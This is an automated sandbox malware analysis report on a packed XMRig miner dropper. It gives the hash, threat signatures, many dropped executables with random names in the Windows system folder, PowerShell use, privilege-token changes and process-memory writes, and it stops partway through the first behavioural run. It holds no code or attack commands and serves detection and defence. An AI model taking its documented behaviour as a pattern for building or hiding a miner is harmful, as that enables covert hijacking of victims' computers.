Malware Analysis Report

2025-01-06 16:11

Sample ID 240525-rh871sfg39
Target aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe
SHA256 eda8ff9459cd1ca9e1ab1b64e8cd456d54706949c164367f0a088213271268d4
Tags
upx miner xmrig execution
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

eda8ff9459cd1ca9e1ab1b64e8cd456d54706949c164367f0a088213271268d4

Threat Level: Known bad

The file aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe was found to be: Known bad.

Malicious Activity Summary

upx miner xmrig execution

Xmrig family

XMRig Miner payload

xmrig

XMRig Miner payload

Command and Scripting Interpreter: PowerShell

Blocklisted process makes network request

UPX packed file

Executes dropped EXE

Loads dropped DLL

Legitimate hosting services abused for malware hosting/C2

Drops file in Windows directory

Unsigned PE

Suspicious use of WriteProcessMemory

Checks processor information in registry

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

Enumerates system info in registry

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-05-25 14:12

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A

Xmrig family

xmrig

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-05-25 14:12

Reported

2024-05-25 14:58

Platform

win7-20240508-en

Max time kernel

150s

Max time network

147s

Command Line

"C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe"

Signatures

xmrig

miner xmrig

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Windows\System\gYVZlOU.exe N/A
N/A N/A C:\Windows\System\vFRtkAQ.exe N/A
N/A N/A C:\Windows\System\QGSMriC.exe N/A
N/A N/A C:\Windows\System\WCqxFNE.exe N/A
N/A N/A C:\Windows\System\ZdCqpFX.exe N/A
N/A N/A C:\Windows\System\gasevNe.exe N/A
N/A N/A C:\Windows\System\WknOtpv.exe N/A
N/A N/A C:\Windows\System\yeBqqJg.exe N/A
N/A N/A C:\Windows\System\MTvukea.exe N/A
N/A N/A C:\Windows\System\QugnbdK.exe N/A
N/A N/A C:\Windows\System\gFxIXFW.exe N/A
N/A N/A C:\Windows\System\UskBwYd.exe N/A
N/A N/A C:\Windows\System\nGOyGaI.exe N/A
N/A N/A C:\Windows\System\VPiKJII.exe N/A
N/A N/A C:\Windows\System\QVyWXtI.exe N/A
N/A N/A C:\Windows\System\qlQHsUV.exe N/A
N/A N/A C:\Windows\System\dSUDnPU.exe N/A
N/A N/A C:\Windows\System\fPnZkqs.exe N/A
N/A N/A C:\Windows\System\xSyyvLF.exe N/A
N/A N/A C:\Windows\System\MfNMjXX.exe N/A
N/A N/A C:\Windows\System\eIngqdw.exe N/A
N/A N/A C:\Windows\System\FAtsXen.exe N/A
N/A N/A C:\Windows\System\HIzPyZx.exe N/A
N/A N/A C:\Windows\System\wsaXEOQ.exe N/A
N/A N/A C:\Windows\System\IHZsPtM.exe N/A
N/A N/A C:\Windows\System\fMFcFUO.exe N/A
N/A N/A C:\Windows\System\wSZfHtv.exe N/A
N/A N/A C:\Windows\System\bZrkSyf.exe N/A
N/A N/A C:\Windows\System\VqsQAdN.exe N/A
N/A N/A C:\Windows\System\bYOkDGE.exe N/A
N/A N/A C:\Windows\System\qcrXDsh.exe N/A
N/A N/A C:\Windows\System\ePqiZpt.exe N/A
N/A N/A C:\Windows\System\iuklPHn.exe N/A
N/A N/A C:\Windows\System\RwApMGw.exe N/A
N/A N/A C:\Windows\System\xWqJLui.exe N/A
N/A N/A C:\Windows\System\LUmsHIi.exe N/A
N/A N/A C:\Windows\System\GbOZvcH.exe N/A
N/A N/A C:\Windows\System\rAeuPnM.exe N/A
N/A N/A C:\Windows\System\nYJGEGJ.exe N/A
N/A N/A C:\Windows\System\tSZHKbO.exe N/A
N/A N/A C:\Windows\System\TKtBXTS.exe N/A
N/A N/A C:\Windows\System\vsaZngE.exe N/A
N/A N/A C:\Windows\System\AceqGMx.exe N/A
N/A N/A C:\Windows\System\nKmPzZy.exe N/A
N/A N/A C:\Windows\System\htLTtkA.exe N/A
N/A N/A C:\Windows\System\IMKqlCt.exe N/A
N/A N/A C:\Windows\System\SAiOkiy.exe N/A
N/A N/A C:\Windows\System\jljolPC.exe N/A
N/A N/A C:\Windows\System\zLwthxm.exe N/A
N/A N/A C:\Windows\System\RzzWebI.exe N/A
N/A N/A C:\Windows\System\hStAtTq.exe N/A
N/A N/A C:\Windows\System\FMXOiKw.exe N/A
N/A N/A C:\Windows\System\mrWsvOL.exe N/A
N/A N/A C:\Windows\System\KZLmXvE.exe N/A
N/A N/A C:\Windows\System\SJULiQl.exe N/A
N/A N/A C:\Windows\System\nmraRgc.exe N/A
N/A N/A C:\Windows\System\SdFcWSu.exe N/A
N/A N/A C:\Windows\System\pLaAzEY.exe N/A
N/A N/A C:\Windows\System\CbAundn.exe N/A
N/A N/A C:\Windows\System\drCEDqA.exe N/A
N/A N/A C:\Windows\System\rENiatQ.exe N/A
N/A N/A C:\Windows\System\uxBRLih.exe N/A
N/A N/A C:\Windows\System\qbRjTnv.exe N/A
N/A N/A C:\Windows\System\ispSBAn.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\System\EQPUrqF.exe C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\ZNdHEEt.exe C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\KtULSWm.exe C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\gBUlSdY.exe C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\muUFcCi.exe C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\hoBfxjX.exe C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\OOqLlDw.exe C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\nbHoWmg.exe C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\nKmPzZy.exe C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\VzEmwwv.exe C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\qVrHRsi.exe C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\IXqNxQp.exe C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\aVAmZlp.exe C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\fPWJcFH.exe C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\iuaOTPE.exe C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\bskEIeB.exe C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\jimdObX.exe C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\yWPSdwH.exe C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\SFUELTG.exe C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\aOndHwd.exe C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\wvACZAL.exe C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\loFQhDe.exe C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\qScdymO.exe C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\uWsDcqI.exe C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\LWufJnJ.exe C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\BPbTyOp.exe C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\iaHqyIB.exe C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\xgZteVm.exe C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\BpBECCE.exe C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\RRLmewK.exe C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\uPBgBhl.exe C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\MgQAhRy.exe C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\glkBRkA.exe C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\ZoihMcI.exe C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\BpAefyW.exe C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\HWqMqZy.exe C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\EDPVdMP.exe C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\YaGGTbg.exe C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\PyfQmlA.exe C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\WvAyWvO.exe C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\CHqaXIY.exe C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\PyesBxI.exe C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\oCbkVtb.exe C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\TEyDpWz.exe C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\NHTPVSg.exe C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\jpDVgqa.exe C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\ieXNsup.exe C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\QdXlxSb.exe C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\Fpakedt.exe C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\PbqNsYf.exe C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\lADSimf.exe C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\JlnWcYN.exe C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\rejbmHZ.exe C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\DPUvPqm.exe C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\CGzdVys.exe C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\oUNIeqK.exe C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\baaPKxF.exe C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\rxRrmVL.exe C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\xGdouVO.exe C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\SKsQeCn.exe C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\ugGLpRk.exe C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\sBmNEew.exe C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\hYNxqSu.exe C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\vStCrQy.exe C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2116 wrote to memory of 2472 N/A C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2116 wrote to memory of 2472 N/A C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2116 wrote to memory of 2472 N/A C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2116 wrote to memory of 2928 N/A C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe C:\Windows\System\gYVZlOU.exe
PID 2116 wrote to memory of 2928 N/A C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe C:\Windows\System\gYVZlOU.exe
PID 2116 wrote to memory of 2928 N/A C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe C:\Windows\System\gYVZlOU.exe
PID 2116 wrote to memory of 2616 N/A C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe C:\Windows\System\QGSMriC.exe
PID 2116 wrote to memory of 2616 N/A C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe C:\Windows\System\QGSMriC.exe
PID 2116 wrote to memory of 2616 N/A C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe C:\Windows\System\QGSMriC.exe
PID 2116 wrote to memory of 2724 N/A C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe C:\Windows\System\vFRtkAQ.exe
PID 2116 wrote to memory of 2724 N/A C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe C:\Windows\System\vFRtkAQ.exe
PID 2116 wrote to memory of 2724 N/A C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe C:\Windows\System\vFRtkAQ.exe
PID 2116 wrote to memory of 2740 N/A C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe C:\Windows\System\ZdCqpFX.exe
PID 2116 wrote to memory of 2740 N/A C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe C:\Windows\System\ZdCqpFX.exe
PID 2116 wrote to memory of 2740 N/A C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe C:\Windows\System\ZdCqpFX.exe
PID 2116 wrote to memory of 2660 N/A C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe C:\Windows\System\WCqxFNE.exe
PID 2116 wrote to memory of 2660 N/A C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe C:\Windows\System\WCqxFNE.exe
